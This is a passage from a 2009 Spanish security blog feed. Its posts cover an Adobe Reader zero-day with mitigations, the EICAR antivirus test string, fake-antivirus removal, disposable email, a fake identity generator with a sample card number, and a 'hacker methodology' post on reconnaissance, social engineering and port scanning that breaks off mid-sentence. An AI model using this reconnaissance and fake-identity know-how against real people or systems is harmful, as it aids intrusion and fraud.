href="http://www.adobe.com/es/products/reader/"&gt;Adobe Acrobat Reader&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;La gente de Adobe no ganan para sustos &lt;span style="font-weight: bold;"&gt;y es que dicho bug es incluso indetectable por las mejores soluciones antivirus&lt;/span&gt; (aunque se espera que esto cambie en breve) la vulnerabilidad identificada como &lt;a href="http://www.securityfocus.com/bid/37331"&gt;CVE-2009-4324&lt;/a&gt; es critica y por ello se han publicado unos consejos para paliar en la medida de lo posible este agujero hasta que este disponible el parche que resuelva el problema que&lt;a href="http://blog.segu-info.com.ar/2009/12/adobe-solucionara-la-vulnerabilidad-de.html"&gt; segun Adobe sera el 12 de Enero.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;¿Como protegernos?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Una de las opciones para protegernos mientras llega el día D seria esta aplicación &lt;a href="http://kb2.adobe.com/cps/532/cpsid_53237.html"&gt;Acrobat JavaScript Blacklist Framework&lt;/a&gt; que descarga un par de archivos que modifican el registro. Otra opción viable seria el desactivar Javascript del propio Acrobat Reader desde Editar--Preferencias--Javascript, por supuesto el utilizar el Addons&lt;a href="https://addons.mozilla.org/es-ES/firefox/addon/722"&gt; Noscript&lt;/a&gt; para los usuarios de Firefox no viene nada mal para esta situación en cuestión y para muchas otras , en fin que como veis podemos protegernos mientras llega el ansiado día 12 de Enero. Por ultimo podemos elegir por desinstalar directamente la aplicación de Adobe e instalar otro lector de archivos PDF como por ejemplo los que aparecen en esta &lt;a href="http://pdfreaders.org/"&gt;web&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Para mas información sobre esta vulnerabilidad critica Adobe a puesto a disposición de los usuarios esta pagina  &lt;a href="http://blogs.adobe.com/psirt/"&gt;blog PSIRT&lt;/a&gt; desde donde la cual podremos seguir las evoluciones del bug que afecta actualmente a Adobe Acrobat Reader.&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://hackdosx.blogspot.com/"&gt;Hackdosx&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-1195675974134370644?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/1195675974134370644/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/0-day-en-adobe-acrobat-reader.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1195675974134370644'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1195675974134370644'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/0-day-en-adobe-acrobat-reader.html' title='0 Day en Adobe Acrobat Reader'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_YNIDIRwEu4M/SyqhV_QVwyI/AAAAAAAAAgI/uJ7n62pBq54/s72-c/acrobat+reader.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2405992088407233450</id><published>2009-12-22T15:15:00.002+01:00</published><updated>2009-12-22T15:18:44.679+01:00</updated><title type='text'>Verificar si el antivirus funciona correctamente</title><content type='html'>En muchas ocasiones dudamos si nuestro antivirus está funcionando de la forma en que debe, es decir, si está siempre activo (modo residente), actualizado y pendiente de todo lo que en nuestro sistema se ejecuta; pero, ¿cómo podemos saberlo? Fácil, un simple truco.&lt;br /&gt;&lt;br /&gt;Copiar un codigo malicioso en el block de notas y guardarlo si el anti-virus lo detcta funciona bien.&lt;br /&gt;&lt;br /&gt;&lt;span class="entry"&gt;1. Abrimos el Bloc de notas, luego escribimos la siguiente línea de código: &lt;p&gt;&lt;span style="font-size: 8pt;"&gt;&lt;code&gt;X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*&lt;/code&gt;&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;&lt;span class="entry"&gt;2. Guardamos el archivo de texto. En seguida, el antivirus debe mostrarnos de una vez la advertencia de que encontró un código malicioso.&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;3. Si el antivirus no te envía ninguna alerta, algo está mal, así que debes verificar qué está pasando, reinistalar el antivirus, o buscar alguna solución alterna. &lt;/p&gt;&lt;/span&gt; &lt;p&gt;Este pequeño código (“malicioso”) simulará un virus, por lo que el antivirus lo va a detectar como si se tratara de alguno, pero no te preocupes, que si lo detecta como tal, debes más bien alegrarte, pues estarás seguro de que tu antivirus funciona correctamente.&lt;br /&gt;&lt;/p&gt;&lt;span class="entry"&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2405992088407233450?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2405992088407233450/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/verificar-si-el-antivirus-funciona.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2405992088407233450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2405992088407233450'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/verificar-si-el-antivirus-funciona.html' title='Verificar si el antivirus funciona correctamente'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-9202133501359289897</id><published>2009-12-21T19:43:00.001+01:00</published><updated>2009-12-21T19:45:02.413+01:00</updated><title type='text'>Eliminar falsos antivirus del sistema con Remove Fake Antivirus</title><content type='html'>&lt;span class="entry"&gt;&lt;p align="center"&gt;&lt;a href="http://www.bloginformatico.com/wp-content/uploads/2009/05/removefakeantivirus.jpg"&gt;&lt;img title="Remove Fake Antivirus" style="border: 0px none ; display: inline;" alt="Remove Fake Antivirus" src="http://www.bloginformatico.com/wp-content/uploads/2009/05/removefakeantivirus-thumb.jpg" border="0" width="242" height="133" /&gt;&lt;/a&gt; &lt;/p&gt; &lt;p&gt;¿&lt;em&gt;Falsos antivirus&lt;/em&gt;? Muchas veces hemos leído en blogs como &lt;a href="http://spamloco.net/search/label/Antivirus%20falsos" target="_blank"&gt;el de SpamLoco&lt;/a&gt; que existen antivirus que no son tan auténticos como tal, sino que se tratan de programas espía que te engañan, promocionándote una solución en su “gran antivirus” a problemas de seguridad.&lt;/p&gt; &lt;p&gt;Entonces cuando procedemos a instalar estos antivirus falsos, nuestro sistema se llenará de cualquier basura informática. Pero tranquilo, que para combatir esas porquerías conocí &lt;strong&gt;Remove Fake Antivirus&lt;/strong&gt;, cuyo objetivo es eliminar falsos antivirus instalados en tu sistema.&lt;/p&gt; &lt;p&gt;Pues bien, los &lt;a href="http://www.bloginformatico.com/etiqueta/falsos-antivirus"&gt;falsos antivirus&lt;/a&gt; que soporta &lt;strong&gt;Remove Fake Antivirus&lt;/strong&gt; son: Personal Antivirus, Anti-Virus-1, Spyware Guard 2008, Antivirus 360, SystemGuard2009, Antivirus 2009, System Security, Antivirus 2010, Antivirus Pro 2009, y MS Antispyware 2009. Son los más comunes.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Remove Fake Antivirus&lt;/strong&gt; está en inglés, lamentablemente, pero funciona en Windows Vista, XP, 2003, 7, entre otros. Aunque carece de diferentes opciones para el usuario, lo que sí le aseguro a cualquier lector del blog es que es muy fácil de usar y a su vez bastante efectivo.&lt;/p&gt;&lt;p&gt;&lt;span class="entry"&gt;Enlace web | &lt;a href="http://freeofvirus.blogspot.com/2009/05/remove-fake-antivirus-10.html" target="_blank"&gt;Remove Fake Antivirus&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;fuente: http://www.bloginformatico.com&lt;br /&gt;&lt;span class="entry"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-9202133501359289897?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/9202133501359289897/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/eliminar-falsos-antivirus-del-sistema.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/9202133501359289897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/9202133501359289897'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/eliminar-falsos-antivirus-del-sistema.html' title='Eliminar falsos antivirus del sistema con Remove Fake Antivirus'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6044132551833830973</id><published>2009-12-19T16:17:00.003+01:00</published><updated>2009-12-19T16:22:26.499+01:00</updated><title type='text'>E-mail desechable, anónimo y gratuito. Servicio Anti SPAM.</title><content type='html'>&lt;h2 class="nw alc"&gt;Correo Electrónico Temporal&lt;/h2&gt;&lt;br /&gt;&lt;h4&gt;Todas las posibilidades de direcciones temporales ya existen&lt;/h4&gt;Disponga de un correo electrónico válido para sus inscripciones en Internet. Todas las cajas de recepción están disponibles y accesibles sin inscripción ni contraseña&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;div class="b nw" style="width: 200px; position: relative; top: -8px;"&gt;&lt;div class="good" style="margin-left: 20px;"&gt;&lt;h5&gt;&lt;b&gt;No registro!&lt;/b&gt;&lt;/h5&gt;&lt;/div&gt;&lt;div class="good" style="margin-left: 20px;"&gt;&lt;h5&gt;&lt;b&gt;Sin contraseñ!&lt;/b&gt;&lt;/h5&gt;&lt;/div&gt;&lt;div class="good" style="margin-left: 20px;"&gt;&lt;h5&gt;&lt;b&gt;auto generados buzón!&lt;/b&gt;&lt;/h5&gt;&lt;/div&gt;&lt;div class="good" style="margin-left: 20px;"&gt;&lt;h5&gt;&lt;b&gt;mensajes de 8 días mantenido!&lt;/b&gt;&lt;/h5&gt;&lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Este correo electrónico cubo de la basura y anti-spam le permitirá no recibir más a los correos indeseables sobre su cuenta e-mail personal. &lt;/h4&gt;&lt;h2 class="alc"&gt;¿Cómo funciona esto?&lt;/h2&gt; &lt;ul&gt;&lt;li class="pdet"&gt;Basta con utilizar cualquier &lt;strong&gt;correo electrónico desechable&lt;/strong&gt; (ex : '&lt;quenimporte&gt;@yopmail.com') para sus inscripciones, demandas de informaciones o de documentaciones sobre los sitios Internet. El mails enviados por estos sitios son instantáneamente consultables en su &lt;strong&gt;buzón provisional &lt;/strong&gt; '&lt;quenimporte&gt;' sobre el sitio www.yopmail.com o directamente por: &lt;span class="b"&gt;http://www.yopmail.com?quenimporte&lt;/span&gt;&lt;/li&gt;&lt;li class="pdet"&gt;No es necesario crear una dirección sobre YopMail.com: todas las posibilidades ya existen. Estos correos electrónicos falsos jamás son suprimidos. En cambio, cada mensaje automáticamente es suprimido al cabo de 8 días. Es tan posible suprimir manualmente los mensajes leídos .&lt;/li&gt;&lt;li class="pdet"&gt;YopMail no permite el envío de &lt;strong&gt;e-mail anónimo&lt;/strong&gt;. Usted puede sin embargo enviar un &lt;strong&gt;e-mail anónimo&lt;/strong&gt; hacia las direcciones YopMail. &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;enlace:   http://www.yopmail.com/es/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6044132551833830973?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6044132551833830973/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/e-mail-desechable-anonimo-y-gratuito.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6044132551833830973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6044132551833830973'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/e-mail-desechable-anonimo-y-gratuito.html' title='E-mail desechable, anónimo y gratuito. Servicio Anti SPAM.'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6963279435960899553</id><published>2009-12-18T16:09:00.003+01:00</published><updated>2009-12-18T16:51:25.271+01:00</updated><title type='text'>Ultimate Boot CD para Windows</title><content type='html'>&lt;div style="text-align: left;"&gt;El sistema operativo de Microsoft es una verdadera caja de ( &lt;strike&gt;sorpresas)&lt;/strike&gt; disgustos, y esto resulta especialmente sangrante para los que somos aficionados a hacerle pasar por todas las perrerías posibles. &lt;strong&gt;Seguro que a más de uno le ha pasado&lt;/strong&gt; que, por haber toqueteado lo que no debía, o simplemente por un error humano perfectamente comprensible, el buen Windows le decide dejar de arrancar. &lt;/div&gt;&lt;p&gt;¿Qué toca entonces? Pues ya se sabe: formateo y a empezar de nuevo, aunque puede que con ello perdamos material personal o profesional muy valioso (esas copias de seguridad…). Por suerte hay una alternativa bastante efectiva para este problema, y encima de todo es gratuita. Se trata de Ultimate Boot CD, un disco de arranque que incluye una importante colección de herramientas de diagnóstico y reparación de errores, y gracias a las cuales &lt;strong&gt;es capaz de solucionar casi cualquier fallo del sistema&lt;/strong&gt;. No resulta infalible, pero en cualquier caso es un elemento directamente imprescindible en todos aquellos hogares que usen el “Ventanas”.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a target="_blank" href="http://www.ultimatebootcd.com/download.html"&gt;Mirrors de descarga de Ultimate Boot CD 3.4&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6963279435960899553?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6963279435960899553/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/ultimate-boot-cd-para-windows.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6963279435960899553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6963279435960899553'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/ultimate-boot-cd-para-windows.html' title='Ultimate Boot CD para Windows'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4835596446333039190</id><published>2009-12-16T18:25:00.004+01:00</published><updated>2009-12-16T18:31:24.744+01:00</updated><title type='text'>Generador de identidades falsas</title><content type='html'>&lt;a href="http://es.fakenamegenerator.com/gen-male-sp-sp.php"&gt;Generador de identidades falsas.....&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;Si quieres registrarte en una web y ese dia no te encuentras lo suficientemente inspirado como para inventarte todos los campos se suelen requerir te vendrá muy bien este generador de identidades falsas.&lt;br /&gt;&lt;br /&gt;La identidad es configurable (sexo, país...) y muy completa, incluso incluye numero de Visa con fecha de caducidad. El resultado lo puedes guardar como permalink o vCard. Un ejemplo de personalidad generada con esta web:&lt;br /&gt;&lt;br /&gt; Jodi R. Glass&lt;br /&gt; 899 Pell Drive&lt;br /&gt; Fort Lauderdale, FL 33301&lt;br /&gt;&lt;br /&gt; Email Address: Jodi.R.Glass@mytrashmail.com&lt;br /&gt;&lt;br /&gt; Phone: 954-825-1716&lt;br /&gt; Mother's maiden name: Huebner&lt;br /&gt; Birthday: March 16, 1980&lt;br /&gt;&lt;br /&gt; Visa: 4539 7828 0655 6150&lt;br /&gt; Expires: 1/2009&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4835596446333039190?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4835596446333039190/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/generador-de-identidades-falsas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4835596446333039190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4835596446333039190'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/generador-de-identidades-falsas.html' title='Generador de identidades falsas'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4435866135426397517</id><published>2009-12-13T20:14:00.003+01:00</published><updated>2009-12-13T20:15:50.725+01:00</updated><title type='text'>Los fallos del software de código abierto se solucionan antes</title><content type='html'>&lt;p&gt;Una serie de estadísticas realizadas por la compañía Vercacode afirman que tres cuartas partes del software no cumplen con un nivel aceptable de seguridad.&lt;/p&gt;&lt;br /&gt; &lt;p&gt;El software de código abierto es más propenso a fallos graves de seguridad, pero se arreglan más rápido. Esto es al menos lo que se desprende de una investigación realizada por la empresa de seguridad &lt;a href="http://www.veracode.com/" target="_blank"&gt;Veracode&lt;/a&gt; y a la que ha tenido acceso &lt;a href="http://www.v3.co.uk/" target="_blank"&gt;V3.co.uk&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;El proyecto Open Source Ratings Database es un repositorio centralizado de evaluaciones de seguridad de programas de código abierto que incluye el análisis de cerca de cien aplicaciones empresariales, incluidas Firefox, Apache, MySQL o JBoss.&lt;/p&gt; &lt;p&gt;Los últimos datos muestran que el 24% del software open source tiene un “nivel de seguridad aceptable” y que el software comercial es sólo ligeramente peor, con un porcentaje del 23%. Del informe también se desprende que el 23% de la fuente abierta, y sólo el 5% de las aplicaciones comerciales, contienen al menos un fallo de seguridad grave.&lt;/p&gt; &lt;p&gt;En cuanto a los tiempos, al software de código abierto le lleva menos de una semana remediar una vulnerabilidad, según la investigación.&lt;/p&gt; &lt;p&gt;Fuente:&lt;br /&gt;Por Rosalía Arroyo&lt;br /&gt;&lt;a href="http://www.itespresso.es/" target="_blank"&gt;http://www.itespresso.es&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4435866135426397517?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4435866135426397517/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/parte-1-httpwwwmegauploadcomd5hu1ke6c.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4435866135426397517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4435866135426397517'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/parte-1-httpwwwmegauploadcomd5hu1ke6c.html' title='Los fallos del software de código abierto se solucionan antes'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-170393555860708462</id><published>2009-12-12T19:30:00.003+01:00</published><updated>2009-12-12T19:37:40.097+01:00</updated><title type='text'>Metodología del Hacker</title><content type='html'>&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;1.- Búsqueda de Información&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Una cautelosa búsqueda de sistemas y recopilación de información es el primer paso antes de&lt;br /&gt;ponerse a experimentar. Debe comprobarse qué máquinas componen el sistema y qué rango de&lt;br /&gt;direcciones IP ocupan. Esto nos dará una idea del alcance y la complejidad del trabajo que va a ser&lt;br /&gt;realizado y ayuda a identificar los puntos débiles por los que hay que empezar a realizar las pruebas.&lt;br /&gt;Muchas veces podemos tener acceso a información pública sobre una empresa cualquiera, pero no&lt;br /&gt;conocemos los métodos para conseguirla. La base de datos NIC (Network Information Center), donde&lt;br /&gt;se almacenan los datos de las personas o empresas que han comprado un dominio de tipo .com, .mx,&lt;br /&gt;.net, etc, es un buen punto por donde arrancar. Con esta base de datos NIC podremos encontrar&lt;br /&gt;nombre de los responsables, tanto técnicos como administrativos, números de teléfono, correos,&lt;br /&gt;direcciones físicas. Esta dirección está ahí para gestionar la compra de dominios. Los datos son&lt;br /&gt;públicos y pueden ser consultados por cualquier persona. Es análogo a la Sección Amarilla de la guía&lt;br /&gt;telefónica, pero referida a los dominios en Internet.&lt;br /&gt;&lt;br /&gt;Con este tipo de consultas se pueden evitar estafas como las de Banamexnet, haciendo una&lt;br /&gt;comprobación para saber si un dominio sospechoso pertenece realmente a la entidad que parece&lt;br /&gt;representar. Al consultar un dominio, la información viene dividida en cuatro secciones:&lt;br /&gt;Empresa: Lo más relevante resulta la dirección física de la empresa, el contacto técnico y los&lt;br /&gt;servidores de nombres. Esto último resulta especialmente atractivo para el hacker.&lt;br /&gt;Contacto administrativo: Nombre, correo electrónico, teléfono y fax.&lt;br /&gt;Contacto técnico: Este dato también se presenta interesante en caso de ser necesario avisar sobre&lt;br /&gt;algún error de seguridad en su página. Aquí se puede consultar su correo electrónico, nombre,&lt;br /&gt;teléfono, etc.&lt;br /&gt;Contacto de facturación: Igualmente se consultan correo electrónico, nombre, teléfono, etc.&lt;br /&gt;Para empresas internacionales cuyo dominio termine en .com o .net, podemos echar mano del&lt;br /&gt;servicio whois10 de nic.com (http://www.nic.com/nic_info/whois.htm), donde la información&lt;br /&gt;proporcionada viene a ser la misma.&lt;br /&gt;Serán muchas las ocasiones en que el buen uso de un buscador nos puede ahorrar mucho tiempo de&lt;br /&gt;investigación.&lt;br /&gt;Imaginémonos que a partir de nic.es averiguamos el email del administrador o el responsible técnico&lt;br /&gt;de la empresa. O, mejor aún, mediante un ataque de ingeniería social averiguamos su dirección&lt;br /&gt;personal de hotmail o cualquier otro servidor de correo web. Introducimos su email en el navegador y&lt;br /&gt;nos lleva a varias páginas más o menos interesantes. En una de ellas llegamos a descubrir que hace&lt;br /&gt;tan solo unos meses, estampó su dirección real en una lista de correo especializada sobre&lt;br /&gt;herramientas pidiendo asesoría y presupuestos sobre actualizaciones de routers.&lt;br /&gt;Muchos administradores de sistemas se enfrentan casi a diario con nuevo software y tienen que&lt;br /&gt;pedir ayuda a especialistas en internet en busca de consejo y compartir experiencias propias. Esto no&lt;br /&gt;es raro y resulta incluso frecuente. Lo que a muchos se les pasa, y en esto entra la ignorancia, es&lt;br /&gt;que hay que hacerlo de manera anónima. Esta es una de las maneras más limpias y libre de&lt;br /&gt;molestias con las que los hackers encuentran información sin tener que sumergirse en manuales o&lt;br /&gt;hacer pruebas en decenas de programas, además, en casos así o parecidos, ya tenemos la certeza de&lt;br /&gt;que el router es o ha sido vulnerable y que puede existir realmente una forma de atacar. Un router&lt;br /&gt;(encaminador, direccionador, enrutador) es un dispositivo que distribuye tráfico entre redes. La&lt;br /&gt;decisión sobre a donde enviar los datos se realiza en base a información de nivel de red y tablas de direccionamiento.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;2.- Escaneo de Puertos&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Nos centraremos en el aspecto práctico en el capítulo sobre escaneadores de puertos (página 91).&lt;br /&gt;Gracias a distintas técnicas sabremos los puertos que el servidor mantiene abiertos ofreciendo&lt;br /&gt;servicios a través de ellos. Cuantos más puertos se encuentren abiertos, más servicios ofrece y más&lt;br /&gt;posibilidades de que alguno sea vulnerable. Este paso resulta imprescindible y de gran importancia.&lt;br /&gt;Hay que advertir: Un escaneo de puertos indiscriminado hacia una máquina que no nos pertenezca&lt;br /&gt;constituye un delito.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;3.- Identificación de Servicios&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La función de un puerto es tener enlazado un servicio o programa que escuche en él y por el que se&lt;br /&gt;realicen las conexiones necesarias. En este paso se descubre qué programa hace uso de cada puerto,&lt;br /&gt;anotando en conciencia su versión.&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4.- Identificación del Sistema&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Aunque se puede deducir a partir de la identificación de servicios (existen servicios válidos&lt;br /&gt;únicamente para Windows o Unix) se requerirá comprobar en que plataforma y sistema operativo&lt;br /&gt;esta trabajando el servidor, pues los datos que ofrecen los servicios pueden estar falseados.&lt;br /&gt;Podemos empezar usando la herramienta web netcraft.com, que cuenta con varios servicios. Uno de&lt;br /&gt;ellos nos indica el Sistema Operativo y la versión del servidor web, así como los datos del proveedor&lt;br /&gt;de Internet donde está alojado. Esto esta muy bien por la información que puede darnos.&lt;br /&gt;En esta página hay un servicio llamado “What is this site running” que informa qué software esta&lt;br /&gt;usando para su servicio web. Al introducir alguna dirección web aparecerá algo como esto:&lt;br /&gt;The site www.xxxxx.com is running Apache/1.3.27 (unix) mod_bwprotect/0.2&lt;br /&gt;Mod_log_bytes/1.2 mod_bwlimted/1.0 PHP/4.3.1 frontpage/5.0.2.2510&lt;br /&gt;Mod _ssl/2.8.12 OpenSSL/.09.6b on Linux&lt;br /&gt;En el apartado más abajo, llamado Netblock owner nos lleva a un link en el que podemos conocer&lt;br /&gt;otros sites alojados en el mismo proveedor de caudal de Internet, y propietario del bloque de&lt;br /&gt;direcciones IP. Incluso podremos conocer el lugar geográfico donde se encuentra esa computadora.&lt;br /&gt;Es posible que netcraft.com solo muestre un escueto:&lt;br /&gt;The site www.xxxxx.com is running Apache on Linux&lt;br /&gt;Lo que nos indica que el administrador ha hecho que la información sobre las versiones que usa no&lt;br /&gt;estén disponibles públicamente.&lt;br /&gt;Otro servicio de netcraft es la búsqueda por nombre de dominio. A veces, si buscamos una página&lt;br /&gt;sobre seguridad, por ejemplo, en un buscador como Google, nos llevará a miles de lugares distintos y&lt;br /&gt;no sabremos por donde empezar. A menudo nos trae páginas que nada tienen que 